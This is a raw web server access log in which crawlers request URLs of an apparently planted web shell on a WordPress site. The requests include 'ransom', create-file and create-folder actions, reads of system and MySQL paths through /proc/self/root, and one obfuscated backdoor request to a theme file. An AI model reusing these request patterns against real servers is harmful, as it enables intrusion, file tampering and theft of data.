20.171.207.175 - - [15/Jun/2025:09:06:05 -0400] "GET /crapulent231979810.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Fgray_bg.gif&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 2253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:06 -0400] "GET /?aksi=ransom&path=%2F%2Fproc%2Fself%2Froot%2Fvar%2Flib%2Fmysql%2Fwaqar1237_wp78 HTTP/1.1" 200 2167 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:06 -0400] "GET /crapulent231979810.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Ferror.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 3564 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:08 -0400] "GET /?aksi=buatfile&path=%2F%2Fproc%2Fself%2Froot%2Fvar%2Flib%2Fmysql%2Fwaqar1237_wp78 HTTP/1.1" 200 2167 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:08 -0400] "GET /berating836466622.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Faction_success.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 3619 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:09 -0400] "GET /crapulent231979810.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Fdialog-warning.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 3457 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:09 -0400] "GET /?aksi=ransom&path=%2F%2Fproc%2Fself%2Froot%2Fvar%2Flib%2Fmysql%2Fwaqar1237_wp38 HTTP/1.1" 200 2167 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:10 -0400] "GET /crapulent231979810.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Fseopro.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 25060 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:10 -0400] "GET /?aksi=ransom&path=%2F%2Fproc%2Fself%2Froot%2Fvar%2Flib%2Fmysql%2Fwaqar1237_wp75 HTTP/1.1" 200 2167 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:11 -0400] "GET /crapulent231979810.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Fseo-redirect.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 9422 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:11 -0400] "GET /?aksi=ransom&path=%2F%2Fproc%2Fself%2Froot%2Fvar%2Flib%2Fmysql%2Fwaqar1237_wp41 HTTP/1.1" 200 2167 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:12 -0400] "GET /crapulent231979810.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Faction_success.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 3617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:12 -0400] "GET /?aksi=buatfolder&path=%2F%2Fproc%2Fself%2Froot%2Fvar%2Flib%2Fmysql%2Fwaqar1237_wp78 HTTP/1.1" 200 2103 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:13 -0400] "GET /?aksi=buatfolder&path=%2F%2Fproc%2Fself%2Froot%2Fvar%2Flib%2Fmysql%2Fwaqar1237_wp41 HTTP/1.1" 200 2103 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:13 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fcf_dropdown.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage HTTP/1.1" 200 2736 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:14 -0400] "GET /?aksi=buatfolder&path=%2F%2Fproc%2Fself%2Froot%2Fvar%2Flib%2Fmysql%2Fwaqar1237_wp38 HTTP/1.1" 200 2103 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:15 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Foption_page.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage HTTP/1.1" 200 5080 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:16 -0400] "GET /?aksi=buatfile&path=%2F%2Fproc%2Fself%2Froot%2Fvar%2Flib%2Fmysql%2Fwaqar1237_wp38 HTTP/1.1" 200 2167 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:16 -0400] "GET /berating836466622.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Fseo-redirect.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 9422 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:17 -0400] "GET /?aksi=buatfile&path=%2F%2Fproc%2Fself%2Froot%2Fvar%2Flib%2Fmysql%2Fwaqar1237_wp41 HTTP/1.1" 200 2167 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:17 -0400] "GET /berating836466622.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Fseopro.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 25060 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:18 -0400] "GET /?aksi=buatfile&path=%2F%2Fproc%2Fself%2Froot%2Fvar%2Flib%2Fmysql%2Fwaqar1237_wp75 HTTP/1.1" 200 2167 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:18 -0400] "GET /crapulent231979810.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Ferror.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 3564 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:19 -0400] "GET /?aksi=buatfolder&path=%2F%2Fproc%2Fself%2Froot%2Fvar%2Flib%2Fmysql%2Fwaqar1237_wp75 HTTP/1.1" 200 2103 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:19 -0400] "GET /berating836466622.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Ferror.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 3564 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.89.90.224 - - [15/Jun/2025:09:06:19 -0400] "GET /?filesrc=//lib64/libnss_compat-2.28.so&path=//lib64 HTTP/1.1" 200 34148 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.66 - - [15/Jun/2025:09:06:20 -0400] "GET /?aksi=ransom&path=%2F%2Fproc%2Fself%2Froot%2Fvar%2Flib%2Fmysql%2Fwaqar1237_wp38 HTTP/1.1" 200 2167 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:20 -0400] "GET /berating836466622.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Faction_success.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 3619 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:21 -0400] "GET /berating836466622.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Fdialog-warning.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 3455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:21 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FHTTP%3A%3AConfig.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 5454 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:22 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Ffunctions.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage HTTP/1.1" 200 4467 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:23 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FCrypt%3A%3ASSLeay.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 9316 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
162.0.232.193 - - [15/Jun/2025:09:04:44 -0400] "GET /wp-content/themes/twentynineteen/sass/layout/layout/index.php?ARRAY=7o2230223n313734393939363238342p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313734393939323638342q3436633337376134393433383831306161663231653063333331383566393832222p2232223n223234336632316336393733616437393438653632616638643836363463346466222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33332q36302q36382q37332q38372q3135227q HTTP/1.1" 200 0 "-" "-"
20.171.207.175 - - [15/Jun/2025:09:06:24 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Funinstall.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage HTTP/1.1" 200 2692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:24 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FCMS_get0_signers.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 5765 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:25 -0400] "GET /crapulent231979810.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Flarge-info.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 3970 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:25 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FDSA_get0_engine.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 5476 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:26 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fall-404-redirect-to-homepage.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage HTTP/1.1" 200 4853 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:27 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FUnicode%3A%3AUCD.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 23959 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.202.88.37 - - [15/Jun/2025:09:06:27 -0400] "GET /?filesrc=//etc/wgetrc&path=//etc HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.175 - - [15/Jun/2025:09:06:27 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fscreenshot-1.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage HTTP/1.1" 200 78229 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:28 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FX509_get_pathlen.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 6104 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:28 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fscreenshot-2.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage HTTP/1.1" 200 84606 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:29 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FX509_cmp_time.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4603 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:29 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Flicense.txt&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage HTTP/1.1" 200 14365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:30 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FX509_check_host.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 6152 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:31 -0400] "GET /chockfull836457504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Freadme.txt&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage HTTP/1.1" 200 3436 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:31 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_aria_192_ctr.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:32 -0400] "GET /berating836466622.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages%2Flarge-info.png&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 3970 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:33 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FTAP%3A%3AObject.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 3919 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:33 -0400] "GET /crapulent231979810.shtml?aksi=buatfile&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fjs HTTP/1.1" 200 2500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:34 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FBF_ofb64_encrypt.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 5635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.162.69.192 - - [15/Jun/2025:09:06:36 -0400] "GET /?filesrc=//etc/senderverifybypasshosts&path=//etc HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.175 - - [15/Jun/2025:09:06:35 -0400] "GET /crapulent231979810.shtml?aksi=ransom&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fjs HTTP/1.1" 200 2500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:35 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FNet%3A%3AHTTPS.3pm.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 3876 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:36 -0400] "GET /crapulent231979810.shtml?aksi=buatfolder&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fjs HTTP/1.1" 200 2123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:37 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FDES_ecb2_encrypt.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 7993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:37 -0400] "GET /crapulent231979810.shtml?aksi=buatfolder&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 2128 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:38 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FDSA_get0_engine.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 5476 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:38 -0400] "GET /crapulent231979810.shtml?aksi=buatfile&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 2783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:39 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_aria_128_ctr.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:40 -0400] "GET /berating836466622.shtml?aksi=ransom&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fimages HTTP/1.1" 200 2783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:09:06:41 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3%2FEVP_cast5_ofb.3ssl.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman3 HTTP/1.1" 200 4430 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:09:06:41 -0400] "GET /berating836466622.shtml?aksi=buatfolder&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fall-404-redirect-to-homepage%2Fjs HTTP/1.1" 200 2123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
